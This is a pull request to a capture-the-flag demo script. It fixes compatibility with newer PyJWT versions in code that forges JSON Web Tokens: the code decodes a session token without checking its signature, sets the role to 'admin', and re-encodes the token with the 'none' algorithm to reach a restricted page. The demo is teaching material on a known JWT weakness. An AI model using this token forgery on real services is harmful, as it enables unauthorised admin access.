### PR TITLE
update give_me_the_flag.py to ensure compatibility

### DIFF
--- a/give_me_the_flag.py
+++ b/give_me_the_flag.py
@@ -61,15 +61,17 @@ def main():
                 header = jwt.get_unverified_header(jwttoken) # get the jwt token header, figure out which algorithm the web server is using
                 logging.info("jwt token header: %s\n"%header)
 
-                payload = jwt.decode(jwttoken, verify=False) # decode the jwo token payload, the user role information is claimed in the payload
+                payload = jwt.decode(jwttoken, options={
+                                     "verify_signature": False})
+                # decode the jwo token payload, the user role information is claimed in the payload
                 logging.info("jwt token payload: %s\n"%payload)
 
                 payload["role"] = "admin"
                 fake_jwttoken = jwt.encode(payload, None, algorithm="none") # update the user role and regenerate the jwt token using "none" algorithm
                 logging.info("regenerate a jwt token using 'none' algorithm and changing the role into 'admin'")
-                logging.info(fake_jwttoken.decode("utf-8") + "\n")
+                logging.info(fake_jwttoken + "\n")
                 
-                cookie.value = fake_jwttoken.decode("utf-8")
+                cookie.value = fake_jwttoken
                 break
         flag_page = session_requests.get(private_page_url, headers = headers) # let's visit the restricted page again
         logging.info("\n" + flag_page.text + "\n") # now the webpage should contain the flag information


### PR DESCRIPTION
Thank you so much for the demo! It has helped me a ton in understanding JWT vulnerability.

This pull request is to address the 'Signature verification failed' issue encountered in the script, as reported in this [GitHub issue](https://github.com/gluckzhang/ctf-jwt-token/issues/3) and some string related decoding errors. The script has been updated to ensure compatibility with the latest JWT API, which resolves the signature error. After the update, the script works as intended.

The Signature verification error:

> Traceback (most recent call last):
>   File "/Users/lydiayuan/jwt-vulunerability-demo/give_me_the_flag.py", line 84, in <module>
>     main()
>   File "/Users/lydiayuan/jwt-vulunerability-demo/give_me_the_flag.py", line 64, in main
>     payload = jwt.decode(jwttoken, verify=False) # decode the jwo token payload, the user role information is claimed in the payload
>   File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/jwt/api_jwt.py", line 168, in decode
>     decoded = self.decode_complete(
>   File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/jwt/api_jwt.py", line 116, in decode_complete
>     raise DecodeError(
> jwt.exceptions.DecodeError: It is required that you pass in a value for the "algorithms" argument when calling decode().

The string decoding error:

> Traceback (most recent call last):
>   File "/Users/lydiayuan/jwt-vulunerability-demo/give_me_the_flag.py", line 85, in <module>
>     main()
>   File "/Users/lydiayuan/jwt-vulunerability-demo/give_me_the_flag.py", line 71, in main
>     logging.info(fake_jwttoken.decode("utf-8") + "\n")
> AttributeError: 'str' object has no attribute 'decode'. Did you mean: 'encode'?